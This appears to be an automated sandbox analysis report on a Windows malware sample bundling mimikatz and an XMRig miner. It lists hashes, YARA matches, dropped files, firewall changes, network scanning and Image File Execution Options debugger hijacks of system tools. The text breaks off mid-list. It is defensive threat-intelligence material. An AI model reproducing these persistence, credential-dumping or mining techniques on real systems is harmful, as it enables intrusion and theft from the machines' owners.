Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-01-2025 01:20
Behavioral task
behavioral1
Sample
2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe
-
Size
9.2MB
-
MD5
e8c184f5e781b33090f2fb3c904e4e54
-
SHA1
86484a059ceca3de5a2a82cdb8da85cc07a1cd0c
-
SHA256
361f5b522593aa67c8fdeb28e663c46bf18b543a1dcad9047249c89b97d76769
-
SHA512
787ca47b4b4d004fe8f66ff5294460d37945c370d5d4012195cfd3a8ed78e4f6e51485fcbfcf0153dadc6311422638d39762f028f19cf6b5417126eae0475331
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3896 created 1788 3896 ucdremr.exe 37 -
Xmrig family
-
Contacts a large (29893) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3596-179-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-183-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-200-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-213-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-226-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-236-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-249-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-290-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-291-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-353-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-355-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig behavioral2/memory/3596-361-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2512-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2512-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c61-6.dat mimikatz behavioral2/memory/4388-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2764-138-0x00007FF6CB360000-0x00007FF6CB44E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ucdremr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts ucdremr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2260 netsh.exe 2580 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4388 ucdremr.exe 3896 ucdremr.exe 1908 wpcap.exe 552 kjezifarc.exe 2764 vfshost.exe 4256 htmcbbltr.exe 2224 xohudmc.exe 4304 ewqksq.exe 3596 vktncb.exe 1688 htmcbbltr.exe 4548 htmcbbltr.exe 4868 htmcbbltr.exe 4696 htmcbbltr.exe 2404 htmcbbltr.exe 4172 htmcbbltr.exe 4432 htmcbbltr.exe 228 htmcbbltr.exe 2476 htmcbbltr.exe 4156 htmcbbltr.exe 1220 ucdremr.exe 2144 htmcbbltr.exe 4028 htmcbbltr.exe 2356 htmcbbltr.exe 32 htmcbbltr.exe 4848 htmcbbltr.exe 2780 htmcbbltr.exe 4796 vvbrngnms.exe 4364 ucdremr.exe -
Loads dropped DLL 12 IoCs
pid Process 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 1908 wpcap.exe 552 kjezifarc.exe 552 kjezifarc.exe 552 kjezifarc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 64 ifconfig.me 65 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ucdremr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ucdremr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F ucdremr.exe File opened for modification C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File created C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ucdremr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023cb9-134.dat upx behavioral2/memory/2764-136-0x00007FF6CB360000-0x00007FF6CB44E000-memory.dmp upx behavioral2/memory/2764-138-0x00007FF6CB360000-0x00007FF6CB44E000-memory.dmp upx behavioral2/files/0x0007000000023cc3-141.dat upx behavioral2/memory/4256-142-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4256-146-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/files/0x0007000000023cc2-163.dat upx behavioral2/memory/3596-164-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/1688-172-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4548-176-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-179-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/4868-181-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-183-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/4696-186-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/2404-190-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4172-194-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4432-198-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-200-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/228-203-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/2476-207-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4156-211-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-213-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/2144-220-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4028-224-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-226-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/2356-230-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/32-233-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/4848-235-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-236-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/2780-238-0x00007FF7693F0000-0x00007FF76944B000-memory.dmp upx behavioral2/memory/3596-249-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/3596-290-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/3596-291-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/3596-353-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/3596-355-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx behavioral2/memory/3596-361-0x00007FF6C6160000-0x00007FF6C6280000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\rbqcumykk\UnattendGC\specials\ssleay32.dll ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\wpcap.dll ucdremr.exe File created C:\Windows\yjyimgrn\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\exma-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\tibe-2.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\posh-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\mimidrv.sys ucdremr.exe File created C:\Windows\ime\ucdremr.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\spoolsrv.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\Shellcode.ini ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\ip.txt ucdremr.exe File created C:\Windows\yjyimgrn\ucdremr.exe 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\libxml2.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\trfo-2.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\zlib1.dll ucdremr.exe File opened for modification C:\Windows\rbqcumykk\Corporate\log.txt cmd.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\trch-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\ucl.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\docmicfg.xml ucdremr.exe File created C:\Windows\yjyimgrn\spoolsrv.xml ucdremr.exe File opened for modification C:\Windows\rbqcumykk\ctftbtnzv\Result.txt vvbrngnms.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\vvbrngnms.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\xdvl-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\docmicfg.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\docmicfg.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\spoolsrv.xml ucdremr.exe File created C:\Windows\yjyimgrn\svschost.xml ucdremr.exe File created C:\Windows\yjyimgrn\docmicfg.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\spoolsrv.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\docmicfg.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\scan.bat ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\crli-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\tucl-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\vimpcsvc.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\svschost.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\svschost.xml ucdremr.exe File created C:\Windows\yjyimgrn\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\mimilib.dll ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\svschost.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\spoolsrv.exe ucdremr.exe File opened for modification C:\Windows\yjyimgrn\svschost.xml ucdremr.exe File created C:\Windows\rbqcumykk\upbdrjv\swrpwe.exe ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe ucdremr.exe File opened for modification C:\Windows\rbqcumykk\ctftbtnzv\Packet.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\libeay32.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\AppCapture64.dll ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\vfshost.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\schoedcl.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\AppCapture32.dll ucdremr.exe File opened for modification C:\Windows\yjyimgrn\ucdremr.exe 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe File created C:\Windows\rbqcumykk\ctftbtnzv\Packet.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\cnli-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\coli-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\schoedcl.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\vimpcsvc.xml ucdremr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4608 sc.exe 5108 sc.exe 2032 sc.exe 3356 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ucdremr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key 